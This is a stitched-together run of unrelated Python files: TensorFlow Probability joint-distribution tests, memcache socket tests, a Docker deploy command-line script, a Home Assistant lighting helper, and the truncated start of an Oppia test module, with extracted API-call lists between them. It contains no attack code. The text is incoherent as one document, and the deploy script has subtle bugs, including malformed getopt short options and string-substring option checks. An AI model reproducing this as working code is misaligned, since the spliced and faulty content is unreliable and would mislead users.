xs = self.evaluate(
joint.sample(value=value,
seed=test_util.test_seed(sampler_type=sampler_type)))
self.assertAllEqual(xs[0], v0)
self.assertAllEqual(xs[1].shape,
[value_partial_batch_dim, num_columns])
self.assertAllEqual(xs[2].shape,
[value_partial_batch_dim, num_rows, num_columns])
def test_unit_sample_shape_avoids_vectorization(self):
xs = [] # Collect (possibly symbolic) Tensors sampled inside the model.
@tfd.JointDistributionCoroutineAutoBatched
def dist():
x = yield tfd.Normal(0., 1., name='x')
xs.append(x)
# Try sampling with a variety of unit sample shapes.
self.assertEqual(
[1],
dist.sample(
1, seed=test_util.test_seed(sampler_type='seedless')).x.shape)
self.assertEqual(
[1],
dist.sample([1],
seed=test_util.test_seed(sampler_type='seedless')).x.shape)
self.assertEqual(
[1, 1],
dist.sample([1, 1],
seed=test_util.test_seed(sampler_type='seedless')).x.shape)
# Check that the model only ever saw the trivial sample shape.
for x in xs:
self.assertEqual(x.shape, [])
def test_unit_sample_shape(self):
@tfd.JointDistributionCoroutineAutoBatched
def dist():
x = yield tfd.Normal(loc=tf.zeros([3]), scale=1., name='x')
yield tfd.Bernoulli(logits=tf.einsum('n->', x), name='y')
for sample_shape in [(), 1, [1], [1, 1], [2]]:
self.assertAllEqual(
dist.log_prob(
dist.sample(sample_shape,
seed=test_util.test_seed())).shape,
np.reshape(sample_shape, [-1]))
def test_sample_dtype_structures_output(self):
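    # A namedtuple sample_dtype should structure both the samples and the
    # component distributions as that namedtuple.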
num_features = 4
def dist():
scale_variance = yield Root(tfd.InverseGamma(0.5, 0.5))
scale_noncentered = yield Root(
tfd.Sample(tfd.HalfNormal(1.), num_features))
scale = scale_noncentered * scale_variance[..., None]**0.5
weights_noncentered = yield Root(
tfd.Sample(tfd.Normal(0., 1.), num_features))
yield tfd.Deterministic(weights_noncentered * scale)
# Currently sample_dtype is only used for `tf.nest.pack_structure_as`. In
# the future we may use it for error checking and/or casting.
sample_dtype = collections.namedtuple('Model', [
'scale_variance',
'scale_noncentered',
'weights_noncentered',
'weights',
])(*([None]*4))
joint = tfd.JointDistributionCoroutineAutoBatched(
dist, sample_dtype=sample_dtype, validate_args=True)
self.assertAllEqual(sorted(sample_dtype._fields),
sorted(joint.sample(
seed=test_util.test_seed())._fields))
ds, xs = joint.sample_distributions(seed=test_util.test_seed())
tf.nest.assert_same_structure(sample_dtype, ds)
tf.nest.assert_same_structure(sample_dtype, xs)
self.assertEqual([3, 4], joint.log_prob(joint.sample(
[3, 4], seed=test_util.test_seed())).shape)
def test_repr_with_custom_sample_dtype(self):
sd = collections.namedtuple('Model', ['s', 'w'])(None, None)
def dist():
s = yield tfd.Sample(tfd.InverseGamma(2, 2), 100)
yield tfd.Normal(0, s)
m = tfd.JointDistributionCoroutineAutoBatched(dist, sample_dtype=sd)
self.assertEqual(
('<tfp.distributions.JointDistributionCoroutineAutoBatched'
' \'JointDistributionCoroutineAutoBatched\''
' batch_shape=[]'
' event_shape=Model(s=[100], w=[100])'
' dtype=Model(s=float32, w=float32)>'),
repr(m))
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
@test_util.jax_disable_variable_test
def test_latent_dirichlet_allocation(self, jd_class): # pylint: disable=g-doc-args
"""Tests Latent Dirichlet Allocation joint model.
The LDA generative process can be written as:
```none
N[i] ~ Poisson(xi)
theta[i] ~ Dirichlet(alpha)
Z[i] ~ Multinomial(N[i], theta[i])
for k in 1...K:
      X[i,k] ~ Multinomial(Z[i, k], beta[k])
```
Typically `xi` is specified and `alpha`, `beta` are fit using type-II
maximum likelihood estimators.
Reference: http://www.jmlr.org/papers/volume3/blei03a/blei03a.pdf
"""
seed = test_util.test_seed_stream()
# Hyperparameters.
num_topics = 3
num_words = 10
avg_doc_length = 5
u = tfd.Uniform(low=-1., high=1.)
alpha = tfp.util.TransformedVariable(
u.sample([num_topics], seed=seed()),
tfb.Softplus(), name='alpha')
beta = tf.Variable(u.sample([num_topics, num_words],
seed=seed()), name='beta')
# Note near 1:1 with mathematical specification. The main distinction is the
# use of Independent--this lets us easily aggregate multinomials across
# topics (and in any "shape" of documents).
def lda_coroutine_model():
n = yield Root(tfd.Poisson(rate=avg_doc_length))
theta = yield Root(tfd.Dirichlet(concentration=alpha))
z = yield tfd.Multinomial(total_count=n, probs=theta)
yield tfd.Multinomial(total_count=z, logits=beta)
if jd_class is tfd.JointDistributionCoroutineAutoBatched:
model = lda_coroutine_model
elif jd_class is tfd.JointDistributionSequentialAutoBatched:
model = [
tfd.Poisson(rate=avg_doc_length), # n
tfd.Dirichlet(concentration=alpha), # theta
lambda theta, n: tfd.Multinomial(total_count=n, probs=theta), # z
lambda z: tfd.Multinomial(total_count=z, logits=beta)
]
elif jd_class is tfd.JointDistributionNamedAutoBatched:
model = collections.OrderedDict((
('n', tfd.Poisson(rate=avg_doc_length)),
('theta', tfd.Dirichlet(concentration=alpha)),
('z', lambda theta, n: tfd.Multinomial(total_count=n, probs=theta)),
('X', lambda z: tfd.Multinomial(total_count=z, logits=beta))))
# TODO(b/159842104): Enable autovectorization for Multinomial sampling.
lda = jd_class(model, validate_args=True, use_vectorized_map=False)
# Now, let's sample some "documents" and compute the log-prob of each.
docs_shape = [2, 4] # That is, 8 docs in the shape of [2, 4].
sample = lda.sample(docs_shape, seed=seed())
log_probs = lda.log_prob(sample)
self.assertEqual(docs_shape, log_probs.shape)
# Verify we correctly track trainable variables.
self.assertLen(lda.trainable_variables, 2)
self.assertIs(alpha.pretransformed_input, lda.trainable_variables[0])
self.assertIs(beta, lda.trainable_variables[1])
# Ensure we can compute gradients.
with tf.GradientTape() as tape:
# Note: The samples are not taped, hence implicitly "stop_gradient."
negloglik = -lda.log_prob(sample)
grads = tape.gradient(negloglik, lda.trainable_variables)
self.assertLen(grads, 2)
self.assertAllEqual((alpha.pretransformed_input.shape, beta.shape),
(grads[0].shape, grads[1].shape))
self.assertAllNotNone(grads)
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_default_event_space_bijector(self, jd_class):
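    # The default event space bijector should round-trip samples, and its forward
    # and inverse log-det-Jacobians should be negatives of each other.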
models = {}
def coroutine_model():
high = yield tfd.LogNormal(0., [1.])
yield tfd.Uniform(low=[[-1., -2.]], high=high[..., tf.newaxis])
yield tfd.Deterministic([[0., 1., 2.]])
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.LogNormal(0., [1.]),
lambda high: tfd.Uniform(low=[[-1., -2.]], high=high[..., tf.newaxis]),
tfd.Deterministic([[0., 1., 2.]])
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('high', tfd.LogNormal(0., [1.])),
('x', lambda high: tfd.Uniform(low=[[-1., -2.]], # pylint: disable=g-long-lambda
high=high[..., tf.newaxis])),
('y', tfd.Deterministic([[0., 1., 2.]]))))
joint = jd_class(models[jd_class], batch_ndims=1, validate_args=True)
self.assertAllEqual(joint.batch_shape, [1])
self.assertAllEqualNested(tf.nest.flatten(joint.event_shape),
[[], [2], [3]])
joint_bijector = joint.experimental_default_event_space_bijector()
y = self.evaluate(joint.sample([2, 3], seed=test_util.test_seed()))
x = joint_bijector.inverse(y)
self.assertAllCloseNested(y, joint_bijector.forward(x))
fldj = joint_bijector.forward_log_det_jacobian(
x, event_ndims=tf.nest.pack_sequence_as(joint.dtype, [0, 1, 2]))
ildj = joint_bijector.inverse_log_det_jacobian(
y, event_ndims=tf.nest.pack_sequence_as(joint.dtype, [0, 1, 1]))
self.assertAllEqual(fldj.shape, joint.log_prob(y).shape)
self.assertAllClose(fldj, -ildj)
# Passing inputs *without* batch shape should return sane outputs.
y = self.evaluate(joint.sample([], seed=test_util.test_seed()))
# Strip the sample to represent just a single event.
unbatched_y = tf.nest.map_structure(lambda t: t[0, ...], y)
self.assertAllEqualNested(tf.nest.map_structure(tf.shape, unbatched_y),
joint.event_shape_tensor())
ildj = joint_bijector.inverse_log_det_jacobian(
unbatched_y,
event_ndims=tf.nest.pack_sequence_as(joint.dtype, [0, 1, 1]))
self.assertAllEqual(ildj.shape, joint.log_prob(unbatched_y).shape)
@parameterized.named_parameters(
{'testcase_name': 'coroutine',
'jd_class': tfd.JointDistributionCoroutineAutoBatched},
{'testcase_name': 'sequential',
'jd_class': tfd.JointDistributionSequentialAutoBatched},
{'testcase_name': 'named',
'jd_class': tfd.JointDistributionNamedAutoBatched})
def test_default_event_space_bijector_constant_jacobian(self, jd_class):
models = {}
def coroutine_model():
yield tfd.Normal(0., [1., 2.], name='x')
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Normal(0., [1., 2.], name='x')
]
models[tfd.JointDistributionNamedAutoBatched] = {
'x': tfd.Normal(0., [1., 2.], name='x')}
joint = jd_class(models[jd_class], batch_ndims=1, validate_args=True)
self.assertAllEqual(joint.batch_shape, [2])
joint_bijector = joint.experimental_default_event_space_bijector()
y = self.evaluate(joint.sample([3], seed=test_util.test_seed()))
x = joint_bijector.inverse(y)
self.assertAllCloseNested(y, joint_bijector.forward(x))
fldj = joint_bijector.forward_log_det_jacobian(x)
ildj = joint_bijector.inverse_log_det_jacobian(y)
self.assertAllEqual(fldj.shape, joint.log_prob(y).shape)
self.assertAllClose(fldj, -ildj)
def test_nested_joint_distributions(self):
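    # Auto-batched joint distributions can be nested; batch/event shapes,
    # sampling, and log_prob should compose across the nesting.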
batch_shape = [2, 3]
def inner_fn():
xy = yield tfd.JointDistributionNamedAutoBatched(
{'x': tfd.Normal(loc=tf.zeros(batch_shape),
scale=tf.ones(batch_shape),
name='x'),
'y': lambda x: tfd.Poisson(log_rate=x, name='y')},
batch_ndims=2,
name='xy')
_ = yield tfd.Normal(loc=0., scale=xy['y'], name='z')
joint = tfd.JointDistributionSequentialAutoBatched([
tfd.JointDistributionCoroutineAutoBatched(inner_fn,
batch_ndims=1,
name='a')])
z = joint.sample(seed=test_util.test_seed())
# Batch and event shape.
self.assertAllEqual(joint.batch_shape, [])
self.assertAllEqualNested(
tf.nest.map_structure(lambda x: tf.TensorShape(x.shape), z),
joint.event_shape)
# Sample shape.
z2 = self.evaluate(
joint.sample(5, seed=test_util.test_seed()))
lp2 = joint.log_prob(z2)
self.assertAllEqual(lp2.shape, [5])
z3 = joint.sample(value=z2, seed=test_util.test_seed())
self.assertAllCloseNested(z2, z3)
@parameterized.named_parameters(*[
dict(testcase_name='_{}{}'.format(jd_class.__name__, # pylint: disable=g-complex-comprehension
'_jit' if jit else ''),
jd_class=jd_class, jit=jit)
for jd_class in (tfd.JointDistributionCoroutineAutoBatched,
tfd.JointDistributionSequentialAutoBatched,
tfd.JointDistributionNamedAutoBatched)
for jit in (False, True)
])
def test_kahan_precision(self, jd_class, jit):
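    # With experimental_use_kahan_sum=True, float32 log-probs summed over 20k
    # Poisson terms should closely track a float64 reference.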
maybe_jit = lambda f: f
if jit:
self.skip_if_no_xla()
if not JAX_MODE and not tf.test.is_gpu_available():
self.skipTest('b/179303849')
maybe_jit = tf.function(jit_compile=True)
def make_models(dtype):
models = {}
def mk_20k_poisson(log_rate):
return tfd.Poisson(log_rate=tf.broadcast_to(log_rate[..., tf.newaxis],
log_rate.shape + (20_000,)))
def coroutine_model():
log_rate = yield tfd.Normal(0., dtype(.2), name='log_rate')
yield mk_20k_poisson(log_rate).copy(name='x')
models[tfd.JointDistributionCoroutineAutoBatched] = coroutine_model
models[tfd.JointDistributionSequentialAutoBatched] = [
tfd.Normal(0., dtype(.2)), mk_20k_poisson
]
models[tfd.JointDistributionNamedAutoBatched] = collections.OrderedDict((
('log_rate', tfd.Normal(0., dtype(.2))), ('x', mk_20k_poisson)))
return models
joint = jd_class(make_models(np.float32)[jd_class], validate_args=True,
experimental_use_kahan_sum=True)
joint64 = jd_class(make_models(np.float64)[jd_class], validate_args=True)
stream = test_util.test_seed_stream()
nsamp = 7
xs = self.evaluate(
joint.sample(log_rate=tf.zeros([nsamp]), seed=stream()))
if isinstance(xs, dict):
xs['log_rate'] = tfd.Normal(0, .2).sample(nsamp, seed=stream())
else:
xs = (tfd.Normal(0, .2).sample(nsamp, seed=stream()), xs[1])
xs64 = tf.nest.map_structure(lambda x: tf.cast(x, tf.float64), xs)
lp = maybe_jit(joint.copy(validate_args=not jit).log_prob)(xs)
lp64 = joint64.log_prob(xs64)
lp, lp64 = self.evaluate((tf.cast(lp, tf.float64), lp64))
# Without Kahan, example max-abs-diff: ~0.06
self.assertAllClose(lp64, lp, rtol=0., atol=.01)
def test_kahan_broadcasting_check(self):
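    # Ragged component batch shapes (here () vs. [3]) should be rejected at
    # log_prob time when Kahan summation is used with batch_ndims=1.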
def model():
_ = yield tfd.Normal(0., 1.) # Batch shape ()
_ = yield tfd.Normal([0., 1., 2.], 1.) # Batch shape [3]
dist = tfd.JointDistributionCoroutineAutoBatched(
model, validate_args=True, experimental_use_kahan_sum=True,
batch_ndims=1)
sample = self.evaluate(dist.sample(seed=test_util.test_seed(
sampler_type='stateless')))
with self.assertRaises(ValueError):
self.evaluate(dist.log_prob(sample))
if __name__ == '__main__':
# TODO(b/173158845): XLA:CPU reassociates away the Kahan correction term.
os.environ['XLA_FLAGS'] = '--xla_cpu_enable_fast_math=false'
test_util.main()
| [
"tensorflow.compat.v2.nest.map_structure",
"numpy.log",
"tensorflow.compat.v2.einsum",
"tensorflow_probability.python.internal.test_util.jax_disable_test_missing_functionality",
"tensorflow.compat.v2.cast",
"tensorflow.compat.v2.nest.pack_sequence_as",
"tensorflow.compat.v2.nest.assert_same_structure",
    ...
]
import socket
from typing import Callable, List
import pytest
from pytest_mock import MockerFixture
from meta_memcache.base.memcache_socket import MemcacheSocket
from meta_memcache.errors import MemcacheError
from meta_memcache.protocol import (
Conflict,
Flag,
IntFlag,
Miss,
NotStored,
ServerVersion,
Success,
TokenFlag,
Value,
)
def recv_into_mock(datas: List[bytes]) -> Callable[[memoryview], int]:
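    # Builds a fake socket.recv_into that serves bytes from the queued chunks,
    # splitting a chunk whenever it exceeds the destination buffer (or requested
    # length).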
def recv_into(buffer: memoryview, length: int = 0, flags: int = 0) -> int:
if not datas:
return -1
data = datas[0]
data_size = len(data)
if length > 0:
buffer_size = length
else:
buffer_size = len(buffer)
if data_size > buffer_size:
read = buffer_size
buffer[:] = data[0:buffer_size]
datas[0] = data[buffer_size:]
else:
read = data_size
buffer[0:data_size] = data
datas.pop(0)
return read
return recv_into
@pytest.fixture
def fake_socket(mocker: MockerFixture) -> socket.socket:
return mocker.MagicMock(spec=socket.socket)
def test_get_response(
fake_socket: socket.socket,
) -> None:
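    # EN and NF headers parse as Miss, NS as NotStored, EX as Conflict, and an
    # unrecognized header ("XX") raises MemcacheError.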
fake_socket.recv_into.side_effect = recv_into_mock(
[b"EN\r\n", b"NF\r\nNS", b"\r\nE", b"X\r\nXX\r\n"]
)
ms = MemcacheSocket(fake_socket)
assert isinstance(ms.get_response(), Miss)
assert isinstance(ms.get_response(), Miss)
assert isinstance(ms.get_response(), NotStored)
assert isinstance(ms.get_response(), Conflict)
try:
ms.get_response()
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Error parsing response header" in str(e)
fake_socket.recv_into.side_effect = recv_into_mock(
[b"HD c1\r\nVA 2 c1", b"\r\nOK\r\n"]
)
ms = MemcacheSocket(fake_socket)
result = ms.get_response()
assert isinstance(result, Success)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.size == 2
def test_get_response_1_6_6(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"OK c1\r\nVA 2 c1", b"\r\nOK\r\n"]
)
ms = MemcacheSocket(fake_socket, version=ServerVersion.AWS_1_6_6)
result = ms.get_response()
assert isinstance(result, Success)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.size == 2
def test_noreply(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"EX\r\n", b"MN", b"\r\nHD", b"\r\n"]
)
ms = MemcacheSocket(fake_socket)
ms.sendall(b"test", with_noop=True)
# The first EX should be skipped as it is before the No-op
# response, so this should be a success:
assert isinstance(ms.get_response(), Success)
def test_get_value(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock([b"VA 2 c1\r\nOK\r\n"])
ms = MemcacheSocket(fake_socket)
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.size == 2
ms.get_value(2)
def test_get_value_large(
fake_socket: socket.socket,
) -> None:
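    # A 200-byte value read through a 100-byte buffer requires several socket reads.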
fake_socket.recv_into.side_effect = recv_into_mock(
[b"VA 200 c1 Oxxx W Q Qa \r\n", b"1234567890", b"1234567890" * 19 + b"\r\n"],
)
ms = MemcacheSocket(fake_socket, buffer_size=100)
result = ms.get_response()
assert isinstance(result, Value)
assert result.int_flags == {IntFlag.RETURNED_CAS_TOKEN: 1}
assert result.flags == set([Flag.WIN])
assert result.token_flags == {TokenFlag.OPAQUE: b"xxx"}
assert result.size == 200
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 20
def test_get_value_with_incomplete_endl(
fake_socket: socket.socket,
) -> None:
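    # Shrink the buffer so the trailing \r\n terminator is split across two reads.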
data = b"VA 10\r\n1234567890\r\n"
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 1)
result = ms.get_response()
assert isinstance(result, Value)
assert result.size == 10
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890"
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 2)
result = ms.get_response()
assert isinstance(result, Value)
assert result.size == 10
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890"
def test_bad(
fake_socket: socket.socket,
) -> None:
fake_socket.recv_into.side_effect = recv_into_mock(
[b"VA 10 c1\r\n", b"1234567890XX"]
)
ms = MemcacheSocket(fake_socket, buffer_size=100)
result = ms.get_response()
try:
ms.get_value(result.size)
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Error parsing value" in str(e)
fake_socket.recv_into.side_effect = recv_into_mock(
[b"VA 200 c1\r\n", b"1234567890", b"1234567890" * 19 + b"XX"],
)
ms = MemcacheSocket(fake_socket, buffer_size=100)
result = ms.get_response()
try:
ms.get_value(result.size)
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Error parsing value" in str(e)
fake_socket.recv_into.side_effect = recv_into_mock([b"VA 10 c1", b"XX"])
ms = MemcacheSocket(fake_socket, buffer_size=100)
try:
ms.get_response()
raise AssertionError("Should not be reached")
except MemcacheError as e:
assert "Bad response" in str(e)
def test_reset_buffer(
fake_socket: socket.socket,
) -> None:
data = b"VA 50 \r\n" + (b"1234567890" * 5) + b"\r\n"
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 1)
result = ms.get_response()
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 5
ms._reset_buffer()
assert ms._pos == 0
data = (b"VA 50 \r\n" + (b"1234567890" * 5) + b"\r\n") * 2
fake_socket.recv_into.side_effect = recv_into_mock([data])
ms = MemcacheSocket(fake_socket, buffer_size=len(data) - 10)
result = ms.get_response()
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 5
ms._reset_buffer()
assert ms._pos == len(data) // 2
result = ms.get_response()
value = ms.get_value(result.size)
assert len(value) == result.size
assert value == b"1234567890" * 5
ms._reset_buffer()
assert ms._pos == 0
def test_close(
fake_socket: socket.socket,
) -> None:
ms = MemcacheSocket(fake_socket, buffer_size=100)
ms.close()
fake_socket.close.assert_called_once()
| [
"meta_memcache.base.memcache_socket.MemcacheSocket"
] | [((1351, 1378), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (1365, 1378), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((1870, 1897), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (1884, 1897), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((2381, 2441), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'version': 'ServerVersion.AWS_1_6_6'}), '(fake_socket, version=ServerVersion.AWS_1_6_6)\n', (2395, 2441), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((2916, 2943), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (2930, 2943), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((3295, 3322), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {}), '(fake_socket)\n', (3309, 3322), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((3732, 3776), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (3746, 3776), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((5119, 5163), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (5133, 5163), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((5513, 5557), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (5527, 5557), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((5851, 5895), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (5865, 5895), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n'), ((7156, 7200), 'meta_memcache.base.memcache_socket.MemcacheSocket', 'MemcacheSocket', (['fake_socket'], {'buffer_size': '(100)'}), '(fake_socket, buffer_size=100)\n', (7170, 7200), False, 'from meta_memcache.base.memcache_socket import MemcacheSocket\n')] |
# encoding=utf-8
import sys
import string
import getopt
import pubproxy
import filter
def main(argv):
deploy_channel = None
docker_envs = []
node = None
container_name = None
docker_image = None
volumes = []
    net = 'bridge' # default network mode
ports = []
mode = 'default' # default or swarm
compose_file = None
stack_name = None
usage = 'Usage: main.py --deploy_channel=DEV \
--docker_env="ASPNETCORE_ENVIRONMENT=Development" \
--docker_env="ASPNETCORE_ENDPOINT=192.168.8.11" \
--node=1 \
--container_name=cs-trader-grpc-srv \
--docker_image=cs-trader-grpc-srv:v3.1.8.180717091123 \
--net=host \
--v=source:target \
--port=8585:80'
try:
opts, args = getopt.getopt(argv,
'c:n:cn:i:p:e:m:f:v',
['deploy_channel=', 'channel=', 'docker_env=', 'env=', 'node=', 'container_name=', 'docker_image=', 'image=', 'net=', 'port=', 'mode=', 'file=', 'stack=', 'volume='])
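        # For illustration (hypothetical invocation): argv = ['--channel=DEV',
        # '--node=1'] would yield opts = [('--channel', 'DEV'), ('--node', '1')]
        # and args = [].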
except getopt.GetoptError as er:
print(er)
print(usage)
sys.exit(2)
for opt, arg in opts:
if opt in ('-c', '--deploy_channel', '--channel'):
deploy_channel = arg
elif opt in ('-n', '--node'):
node = arg
elif opt in ('-cn', '--container_name'):
container_name = arg
elif opt in('-i', '--docker_image', '--image'):
docker_image = arg
elif opt in('--net'):
net = arg
elif opt in('-p', '--port'):
ports.append(arg)
elif opt in('-e', '--docker_env', '--env'):
docker_envs.append(str.strip(arg))
elif opt in('-m', '--mode'):
mode = arg
elif opt in('-f', '--file'):
compose_file = arg
elif opt in('--stack'):
stack_name = arg
elif opt in('-v', '--volume'):
volumes.append(str.strip(arg))
    # Filter the publish list when deploying to the prod channel.
if deploy_channel.lower() == 'prod':
filter.filter(container=container_name, stack_compose=compose_file)
proxy = pubproxy.PubProxy(
deploy_channel, node, container_name, docker_image, net, ports, volumes, docker_envs, mode, compose_file, stack_name)
if(mode == 'swarm'):
proxy.publish_stack()
else:
proxy.publish_container()
if __name__ == '__main__':
main(sys.argv[1:])
| [
"getopt.getopt",
"filter.filter",
"sys.exit",
"pubproxy.PubProxy"
] | [((2207, 2346), 'pubproxy.PubProxy', 'pubproxy.PubProxy', (['deploy_channel', 'node', 'container_name', 'docker_image', 'net', 'ports', 'volumes', 'docker_envs', 'mode', 'compose_file', 'stack_name'], {}), '(deploy_channel, node, container_name, docker_image, net,\n ports, volumes, docker_envs, mode, compose_file, stack_name)\n', (2224, 2346), False, 'import pubproxy\n'), ((831, 1047), 'getopt.getopt', 'getopt.getopt', (['argv', '"""c:n:cn:i:p:e:m:f:v"""', "['deploy_channel=', 'channel=', 'docker_env=', 'env=', 'node=',\n 'container_name=', 'docker_image=', 'image=', 'net=', 'port=', 'mode=',\n 'file=', 'stack=', 'volume=']"], {}), "(argv, 'c:n:cn:i:p:e:m:f:v', ['deploy_channel=', 'channel=',\n 'docker_env=', 'env=', 'node=', 'container_name=', 'docker_image=',\n 'image=', 'net=', 'port=', 'mode=', 'file=', 'stack=', 'volume='])\n", (844, 1047), False, 'import getopt\n'), ((2126, 2193), 'filter.filter', 'filter.filter', ([], {'container': 'container_name', 'stack_compose': 'compose_file'}), '(container=container_name, stack_compose=compose_file)\n', (2139, 2193), False, 'import filter\n'), ((1195, 1206), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (1203, 1206), False, 'import sys\n')] |
from __future__ import annotations
from custom_components.magic_lights.const import DOMAIN
from custom_components.magic_lights.magicbase.share import get_magic
import logging
from typing import TYPE_CHECKING
from homeassistant.core import Context
_LOGGER = logging.getLogger(__name__)
if TYPE_CHECKING:
from custom_components.magic_lights.data_structures.living_space import Pipe, Zone
def create_async_call(pipe: Pipe) -> callable:
async def async_call(domain: str, service: str, service_data: dict):
for modifier in pipe.modifiers:
domain, service, service_data = modifier.update(
domain, service, service_data
)
if disabled_entity(pipe, service_data):
return
return await async_call_service(domain, service, service_data)
return async_call
def disabled_entity(pipe: Pipe, service_data: dict) -> bool:
if "entity_id" in service_data:
if service_data["entity_id"] in pipe.scene.zone.disabled_entities:
_LOGGER.debug(
"Entity %s disabled... skipping update.", service_data["entity_id"]
)
return True
return False
async def async_call_service(domain: str, service: str, service_data: dict):
_LOGGER.debug("Updating state: %s", service_data)
context = Context(None, DOMAIN)
magic = get_magic()
return await magic.hass.services.async_call(
domain, service, service_data, context=context
)
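# Illustrative sketch (hypothetical usage, not part of the module): the closure
# returned by create_async_call(pipe) is awaited like the underlying Home
# Assistant service call it wraps, e.g.
#   async_call = create_async_call(pipe)
#   await async_call("light", "turn_on", {"entity_id": "light.kitchen"})
# where "light.kitchen" is a made-up entity id.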
| [
"logging.getLogger",
"custom_components.magic_lights.magicbase.share.get_magic",
"homeassistant.core.Context"
] | [((259, 286), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (276, 286), False, 'import logging\n'), ((1327, 1348), 'homeassistant.core.Context', 'Context', (['None', 'DOMAIN'], {}), '(None, DOMAIN)\n', (1334, 1348), False, 'from homeassistant.core import Context\n'), ((1362, 1373), 'custom_components.magic_lights.magicbase.share.get_magic', 'get_magic', ([], {}), '()\n', (1371, 1373), False, 'from custom_components.magic_lights.magicbase.share import get_magic\n')] |
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for user-related one-off computations."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import ast
import datetime
import re
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import learner_progress_services
from core.domain import rating_services
from core.domain import rights_domain
from core.domain import rights_manager
from core.domain import subscription_services
from core.domain import taskqueue_services
from core.domain import user_jobs_continuous
from core.domain import user_jobs_one_off
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
from core.tests.data import image_constants
import feconf
import python_utils
import utils
auth_models, user_models, feedback_models, exp_models = (
models.Registry.import_models(
[models.NAMES.auth, models.NAMES.user, models.NAMES.feedback,
models.NAMES.exploration]))
datastore_services = models.Registry.import_datastore_services()
search_services = models.Registry.import_search_services()
class UserContributionsOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off dashboard subscriptions job."""
EXP_ID_1 = 'exp_id_1'
